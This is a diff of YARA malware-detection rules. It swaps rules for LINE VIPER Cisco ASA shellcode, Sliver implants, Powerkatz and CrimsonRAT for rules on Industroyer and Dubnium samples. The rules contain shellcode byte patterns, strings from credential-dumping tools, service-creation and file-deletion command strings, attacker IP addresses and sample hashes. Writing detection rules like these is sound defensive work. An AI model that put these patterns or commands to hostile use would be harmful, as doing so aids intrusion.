+		hash1 = "6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47"
 
 	strings:
-		$xc1 = {
-         48 89 FA 48 83 C7 40 4C 89 CE B9 D0 01 00 00 F3 A4 48
-         89 D7 48 83 C7 40 48 89 3A 48 C1 EF 0C 48 C1 E7 0C BA
-         07 00 00 00 48 C7 C6 00 20 00 00
-      }
+		$x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" fullword wide
+		$x2 = "10.15.1.69:3128" fullword wide
+		$s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" fullword wide
+		$s2 = "/c sc stop %s" fullword wide
+		$s3 = "sc start %ls" fullword wide
+		$s4 = "93.115.27.57" fullword wide
+		$s5 = "5.39.218.152" fullword wide
+		$s6 = "tierexe" fullword wide
+		$s7 = "comsys" fullword wide
+		$s8 = "195.16.88.6" fullword wide
+		$s9 = "TieringService" fullword wide
+		$a1 = "TEMP\x00\x00DEF" fullword wide
+		$a2 = "TEMP\x00\x00DEF-C" fullword wide
+		$a3 = "TEMP\x00\x00DEF-WS" fullword wide
+		$a4 = "TEMP\x00\x00DEF-EP" fullword wide
+		$a5 = "TEMP\x00\x00DC-2-TEMP" fullword wide
+		$a6 = "TEMP\x00\x00DC-2" fullword wide
+		$a7 = "TEMP\x00\x00CES-McA-TEMP" fullword wide
+		$a8 = "TEMP\x00\x00SRV_WSUS" fullword wide
+		$a9 = "TEMP\x00\x00SRV_DC-2" fullword wide
+		$a10 = "TEMP\x00\x00SCE-WSUS01" fullword wide
 
 	condition:
-		$xc1
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 3 of them or 1 of ( $a* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_Shellcode_Deobfuscation_Routine
+rule SIGNATURE_BASE_Industroyer_Portscan_3 : FILE
 {
 	meta:
-		description = "Detects LINE VIPER Cisco ASA malware code as part of a shellcode deobfuscation routine."
-		author = "NCSC"
-		id = "6b9be484-87d2-59aa-b477-3f4cb3d5a051"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L74-L93"
+		description = "Detects Industroyer related custom port scaner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f6675466-d469-562b-9fb6-7b72bce8a726"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L79-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9feb3703a99c529b28c12646a0834e77d3377f1fd75ec69c46201cb0d4d22775"
-		score = 85
+		logic_hash = "539a420989c178b3fa26e313d23e9f9c6804aa6dbd2d94f463ae924d46ac2851"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f"
 
 	strings:
-		$xc1 = {
-         48 8B 7F 08 48 8D 5F 70 49 C7 C1 00 18 00 00 49 C7 C0
-         20 00 00 00 48 89 DF 8A 01 32 07 48 FF C7 41 FF C8 4D 85 C0 75 F3
-         88 01 48 FF C1 41 FF C9 4D 85 C9 75 DA
-      }
-		$x1 = "SIt/CEiNX3BJx8EAGAAAScfAIAAAAEiJ34oBMgdI/8dB/8hNhcB184gBSP/BQf/JTYXJdd"
-		$x2 = "iLfwhIjV9wScfBABgAAEnHwCAAAABIid+KATIHSP/HQf/ITYXAdfOIAUj/wUH/yU2FyXXa"
-		$x3 = "Ii38ISI1fcEnHwQAYAABJx8AgAAAASInfigEyB0j/x0H/yE2FwHXziAFI/8FB/8lNhcl12"
+		$s1 = "!ZBfamily" fullword ascii
+		$s2 = ":g/outddomo;" fullword ascii
+		$s3 = "GHIJKLMNOTST" fullword ascii
+		$d1 = "Error params Arguments!!!" fullword wide
+		$d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" fullword wide
+		$d3 = "Exhample:App.exe -ip= 127.0.0.1-100," fullword wide
+		$d4 = "Error IP Range %ls - %ls" fullword wide
+		$d5 = "Can't closesocket." fullword wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) or 2 of ( $d* ) )
 }
-rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_Shellcode_Initial_Execution
+rule SIGNATURE_BASE_Industroyer_Portscan_3_Output
 {
 	meta:
-		description = "Detects LINE VIPER Cisco ASA malware code as part of shellcode initial execution."
-		author = "NCSC (modifier by Florian Roth)"
-		id = "f8e56937-c4af-59ab-9698-21b69b160951"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L95-L117"
+		description = "Detects Industroyer related custom port scaner output file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4469f056-674c-5a44-84a5-12a65b8586d5"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L102-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "813aa79525bb43f62d98142eced501f793764e90a86c7176a686f9017f32eb4b"
-		score = 85
+		logic_hash = "6a2fc7b66b1e93f523e08e12ba420d261bae198918bb09eac1a7cdecc04a6737"
+		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = {
-         48 8D B7 80 00 00 00 BA 00 20 00 00 [19] 48 C7 C6 00
-         90 00 00 BA 07 00 00 00
-      }
-		$xe1 = { 53 49 32 33 67 41 41 41 41 4c 6f 41 49 41 41 41 [26] 6a 48 78 67 43 51 41 41 43 36 42 77 41 41 41 }
-		$xe2 = { 69 4e 74 34 41 41 41 41 43 36 41 43 41 41 41 [26] 49 78 38 59 41 6b 41 41 41 75 67 63 41 41 41 }
-		$xe3 = { 49 6a 62 65 41 41 41 41 41 75 67 41 67 41 41 [26] 53 4d 66 47 41 4a 41 41 41 4c 6f 48 41 41 41 41 }
+		$s1 = "WSA library load complite." fullword ascii
+		$s2 = "Connection refused" fullword ascii
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_RSA_Enc_Random_AES_Key_Gen
+rule SIGNATURE_BASE_Industroyer_Malware_4 : FILE
 {
 	meta:
-		description = "Detects LINE VIPER Cisco ASA malware code as part of RSA encrypted random AES key generation."
-		author = "NCSC"
-		id = "93c11d59-6f1c-585f-9807-a9df7cad2917"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L119-L147"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f197d2a5-eecb-51ed-b991-7643efb3f749"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L117-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c382158e21300f49ed3da58e3e02c4578c10fd854c87a18227a01b7d6f7723bc"
-		score = 85
+		logic_hash = "cb850445eaf3e1a6c9a9d6c453ed0f6729a95a671a01ce8fbaddf15599e4f2ba"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561"
 
 	strings:
-		$xc1 = {
-         48 31 C0 49 89 06 49 89 46 08 49 83 C6 10 49 83 ED 10
-         4D 85 ED 75 D8 BF 30 00 00 00
-      }
-		$xc2 = {
-         0F 85 57 01 00 00 49 8B 44 24 08 48 83 F8 2F 7C 33 41
-         BD F0 02 00 00 4D 8D 74 24 10 49 8B 3E
-      }
-		$xc3 = {
-         85 C0 0F 8E EE 00 00 00 41 BD F0 02 00 00 4D 8D 7C 24
-         10 49 8B 3F 48 85 FF 74 0D 49 83 C7 10 49 83 ED 10 4D 85 ED 75 EB
-         4D 89 37 BF 70 00 00 00
-      }
-		$xc4 = {
-         48 85 C0 0F 84 3F 00 00 00 48 89 45 B0 BF 80 00 00 00
-         4C 89 EE 48 89 C2 48 8B 4D A8 41 B8 01 00 00 00
-      }
+		$s1 = "haslo.dat" fullword wide
+		$s2 = "defragsvc" fullword ascii
+		$a1 = { 00 2E 00 64 00 61 00 74 00 00 00 43 72 61 73 68 00 00 00 }
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or $a1 )
 }
-rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_AES_Enc_Tasking_Exfil
+rule SIGNATURE_BASE_Industroyer_Malware_5 : FILE
 {
 	meta:
-		description = "Detects LINE VIPER Cisco ASA malware code as part of AES encrypted tasking and exfiltration."
-		author = "NCSC"
-		id = "969ebeb6-a9fe-57b3-a60a-ac2611f2afca"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L149-L177"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52ce21a0-0c72-585c-a805-c5077a7445af"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_industroyer.yar#L136-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b6181701b512709c812f303a33e13115bb52f28be7095c086ef2a3b17f6ef4fd"
-		score = 85
+		logic_hash = "9dfd3cfc724f0dfe090b1bcbf03b9ebd0d01b3d781f833a8ca6ba1451a63d5ad"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad"
 
 	strings:
-		$ = {
-         48 31 C0 48 89 45 D8 49 89 FC 49 89 F5 49 89 D6 48 8B
-         47 08 48 89 45 B8 48 8D 40 40 48 89 45 E0 48 8D 70 E0 48 89 75 B0
-         48 8D 78 F0 48 89 7D E8 BA 10 00 00 00
-      }
-		$ = {
-         48 85 C0 0F 84 EA 00 00 00 48 89 45 A8 4C 89 EF 48 89
-         C6 4C 89 F2 48 8B 4D A0 4C 8B 45 B0 4D 31 C9
-      }
-		$ = {
-         48 85 C0 0F 84 82 00 00 00 49 89 C7 48 8B 7D E0 BE 00
-         01 00 00 48 8B 55 A0
-      }
-		$ = {
-         48 8B 7D D0 49 83 C7 10 49 C1 EF 04 49 C1 E7 04 4C 89
-         FE 48 8D 55 D8
-      }
+		$x1 = "D2MultiCommService.exe" fullword ascii
+		$x2 = "Crash104.dll" fullword ascii
+		$x3 = "iec104.log" fullword ascii
+		$x4 = "IEC-104 client: ip=%s; port=%s; ASDU=%u " fullword ascii
+		$s1 = "Error while getaddrinfo executing: %d" fullword ascii
+		$s2 = "return info-Remote command" fullword ascii
+		$s3 = "Error killing process ..." fullword ascii
+		$s4 = "stop_comm_service_name" fullword ascii
+		$s5 = "*1* Data exchange: Send: %d (%s)" fullword ascii
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_MAL_Cisco_LINE_VIPER_ICMP_Tasking_Shellcode_Payloads
+rule SIGNATURE_BASE_Dubnium_Sample_1 : FILE
 {
 	meta:
-		description = "Detects LINE VIPER Cisco ASA malware code as part of ICMP tasking shellcode payloads."
-		author = "NCSC"
-		id = "4a0db4a2-bb78-5cb6-aa12-2f2ebc86077c"
-		date = "2025-09-25"
-		modified = "2025-09-27"
-		reference = "https://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cisco_asa_lineviper_rayinitiator_sep25.yar#L179-L208"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "377ecbaa-9324-562e-a973-0276d44f3feb"
+		date = "2016-06-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a11d8cebae498340065244ddaf6863925ef8368cea20af1d1f21c46fc51280ee"
-		score = 85
+		logic_hash = "94763f42dacbeede9a72c3ecc222164a5808bd74c5d2d783c76831221a9c30c8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
 
 	strings:
-		$ = {
-         55 53 41 54 41 55 41 56 41 57 48 89 E5 48 83 EC 60 48
-         31 C0 B9 07 00 00 00 48 8D 7D A8 F3 48 AB BF 01 00 00
-         00 BE 30 00 00 00
-      }
-		$ = {
-         49 89 C7 48 C7 C2 38 DF FF FF 64 48 8B 0A 48 8B 99 00
-         01 00 00 48 89 81 00 01 00 00
-      }
-		$ = {
-         49 8B 47 10 48 8D 55 B0 BE 01 20 01 00 4C 89 FF FF 90
-         90 00 00 00 48 8B 7D B0 48 85 FF 0F 84 3C 00 00 00
-      }
-		$ = {
-         49 8B 47 10 BE 08 20 01 00 4C 89 FF 48 8D 55 A8 FF 90
-         90 00 00 00 48 8B 7D B0 49 89 7E 20 48 8B 7D A8 49 89
-         7E 28
-      }
+		$key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii
+		$key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_RAR_Single_Doc_File : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_2 : FILE
 {
 	meta:
-		description = "Detects suspicious RAR files that contain nothing but a single .doc file"
+		description = "Detects sample mentioned in the Dubnium Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92dc3a5d-d12c-56d3-8531-25b3da1e1595"
-		date = "2020-07-11"
+		id = "894dc893-25fc-5fdc-9f69-8085b94e1af1"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hunting_susp_rar.yar#L3-L29"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L26-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bfc8c60c86e65e041976dac9d15c486ad99da930849bd697c869eec0a2626c38"
-		score = 40
+		logic_hash = "5b633a7e002609fa78b0de8fb818af1b47fbe77497d161b6b41602fb34780ca8"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
 
 	strings:
-		$s1 = ".doc"
+		$x1 = ":*:::D:\\:c:~:" fullword ascii
+		$s2 = "SPMUVR" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x6152 and filesize < 4000KB and $s1 at ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) - 9 ) and ( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + uint16( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 5 ) + uint32( uint16( 5 ) + uint16( uint16( 5 ) + 5 ) + 7 ) > filesize -8 )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-
-rule SIGNATURE_BASE_Sliver_Implant_32Bit_1
+rule SIGNATURE_BASE_Dubnium_Sample_3 : FILE
 {
 	meta:
-		description = "Sliver 32-bit implant (with and without --debug flag at compile)"
-		author = "gssincla@google.com"
-		id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26"
-		date = "2022-11-18"
-		modified = "2025-03-21"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gcti_sliver.yar#L26-L94"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "66f66139-88df-5ba9-a3fc-ba4fc98ce3f9"
+		date = "2016-06-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L42-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357"
-		logic_hash = "3fec6fbba86a24b395e58f02fb35a60b1b9a4b941b4d85c060cc6159c6aa8265"
+		logic_hash = "851efb71cd80040fdd13d9961d1e0084421c783afc43417ff1ac3ed023a73ae1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8"
+		hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5"
+		hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827"
 
 	strings:
-		$s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74  }
-		$s_wg = { 66 81 ?? 77 67 }
-		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
-		$s_http = { 81 ?? 68 74 74 70 }
-		$s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 }
-		$s_mtls = { 81 ?? 6D 74 6C 73 }
-		$fp1 = "cloudfoundry" ascii fullword
-		$fp2 = "googleapi.Error" ascii
+		$x1 = "copy /y \"%s\" \"%s\" " fullword ascii
+		$x2 = "del /f \"%s\" " fullword ascii
+		$s1 = "del /f /ah \"%s\" " fullword ascii
+		$s2 = "if exist \"%s\" goto Rept " fullword ascii
+		$s3 = "\\*.*.lnk" ascii
+		$s4 = "Dropped" fullword ascii
 
 	condition:
-		4 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of them
 }
-
-rule SIGNATURE_BASE_Sliver_Implant_64Bit_1
+rule SIGNATURE_BASE_Dubnium_Sample_5 : FILE
 {
 	meta:
-		description = "Sliver 64-bit implant (with and without --debug flag at compile)"
-		author = "gssincla@google.com"
-		id = "b84db933-0e11-5871-821d-43697c015665"
-		date = "2022-11-18"
-		modified = "2025-03-21"
-		reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gcti_sliver.yar#L112-L183"
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "09c1aeee-9437-54e9-967f-3c2fcc0736ed"
+		date = "2016-06-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L64-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87"
-		logic_hash = "ccfd944a5bc6521c89d44572910e2998e2404d472a593f9d97224d606d247bcd"
+		logic_hash = "0f84f502ba9a4fe304851badfa98d9e8500cdef472d4358cfd327365ac04dda3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+		hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
 
 	strings:
-		$s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 }
-		$s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 }
-		$s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 }
-		$s_wg = {66 81 ?? 77 67}
-		$s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 }
-		$s_mtls = {  81 ?? 6D 74 6C 73  }
-		$fp1 = "cloudfoundry" ascii fullword
-		$fp2 = "googleapi.Error" ascii
+		$s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii
+		$s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii
 
 	condition:
-		5 of ( $s* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
 }
-rule SIGNATURE_BASE_Powerkatz_DLL_Generic : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_6 : FILE
 {
 	meta:
-		description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)"
+		description = "Detects sample mentioned in the Dubnium Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7464f8a1-9f45-580b-8a97-a57071092e3c"
-		date = "2016-02-05"
+		id = "43366f1a-784d-515e-a8e9-3e924f2abfd8"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "PowerKatz Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powerkatz.yar#L9-L32"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L89-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "979cdb42b54a26960b3173d5ea6abcc5fa61bef57f98b09e55eb4c75f1040a40"
-		score = 80
+		logic_hash = "3425734b3259ebd5390cf16d2e394a4cc735dc3fc9fcc627b46bcc77729e465e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae"
-		hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0"
-		hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872"
+		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
 
 	strings:
-		$s1 = "%3u - Directory '%s' (*.kirbi)" fullword wide
-		$s2 = "%*s  pPublicKey         : " fullword wide
-		$s4 = "<3 eo.oe ~ ANSSI E>" fullword wide
-		$s5 = "\\*.kirbi" wide
-		$c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" fullword wide
-		$c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" fullword wide
+		$s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii
+		$s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii
+		$s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_Crimsonrat_Mar18_1 : FILE
+rule SIGNATURE_BASE_Dubnium_Sample_7 : FILE
 {
 	meta:
-		description = "Detects CrimsonRAT malware"
+		description = "Detects sample mentioned in the Dubnium Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af21876c-f99d-5307-abba-02c57ee93df0"
-		date = "2018-03-06"
+		id = "6712bd5f-6bbc-5ca0-9fc7-b2013b8f8147"
+		date = "2016-06-10"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_crimson_rat.yar#L11-L42"
+		reference = "https://goo.gl/AW9Cuu"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_dubnium.yar#L109-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "59b01a98a70c4bac08d396418fac24eb96e461a45502f63edc2a9aa87e05f960"
+		logic_hash = "76cf4acee025fcae1dec975a124f4bf808f1f09f99f7fa6a4e965febd6a89e3a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
-		hash2 = "7ca6e5ef1d346ec35993c910128a3526b098a07445131784a9358bf5679e3975"
-		hash3 = "be4264973de9886caedae1cb707586588d0da85ac7a2ad277db4258033ea12a8"
-		hash4 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
-		hash5 = "ff52b4a64ed7caeab00350e493968dbdb159aeb545fcba67d83ab9b158464de4"
+		super_rule = 1
+		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
